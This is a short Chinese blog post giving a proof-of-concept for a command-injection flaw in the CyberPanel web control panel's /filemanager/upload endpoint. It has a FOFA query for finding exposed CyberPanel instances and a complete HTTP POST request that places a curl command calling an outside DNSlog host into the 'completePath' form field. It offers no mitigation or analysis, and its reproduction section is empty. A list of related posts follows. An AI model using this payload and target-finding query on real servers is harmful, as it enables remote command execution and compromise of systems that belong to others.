CyberPanel开源Web控制面板 upload 命令执行漏洞复现及POC

CatalyzeSec2024-11-09 17:51

FOFA

复制代码 
app="CyberPanel"

POC

复制代码 
POST /filemanager/upload HTTP/2
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: multipart/form-data; boundary=----NewBoundary123456789
Content-Length: 338

------NewBoundary123456789
Content-Disposition: form-data; name="domainName"

<target>
------NewBoundary123456789
Content-Disposition: form-data; name="completePath"

curl http://DNSlog地址/
------NewBoundary123456789
Content-Disposition: form-data; name="file"; filename="poc.txt"

pwn
------NewBoundary123456789--

漏洞复现

相关推荐
这个人需要休息12 分钟前
优惠卷类型漏洞---优惠卷的并发使用
mysql·网络安全·逻辑漏洞·后端架构
爱讲故事的33 分钟前
计算机网络第 8 章复习:Network Security 网络安全
网络·计算机网络·web安全
黄金龙PLUS1 小时前
基于ARX结构的新型序列密码算法FlashLight
算法·网络安全·密码学·哈希算法·同态加密
顾凌陵1 小时前
PHP序列化漏洞实战:反序列化攻击的奥秘
安全·网络安全
lcreek16 小时前
SQL 注入实战:DVWA High 完整测试指南
网络安全·sql注入
不灭锦鲤18 小时前
网络安全第120天
安全·web安全
超级无敌zhq19 小时前
后渗透痕迹清理:攻防对抗中的隐身术
网络·数据库·网络安全
打码人的日常分享19 小时前
数据安全,网络安全风险评估报告(Word)
安全·web安全
TechWayfarer20 小时前
IP画像在企业安全中的应用:它能做什么?不能替代什么
网络·python·tcp/ip·安全·网络安全
杭州默安科技21 小时前
AI挖掘0day漏洞常态化,企业网络防御该如何破局?
人工智能·网络安全
热门推荐
01《置身钉内》原文-可播放阅读02【AI】2026 年具身智能模型和世界模型总结03GitHub 镜像站点042026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析062026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf07Codex 下载安装指南:Windows 和 macOS 官方版下载08AI科技热点日报 | 2026年6月1日09【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法10CC-Switch 下载、安装与使用配置指南【2026.5.29】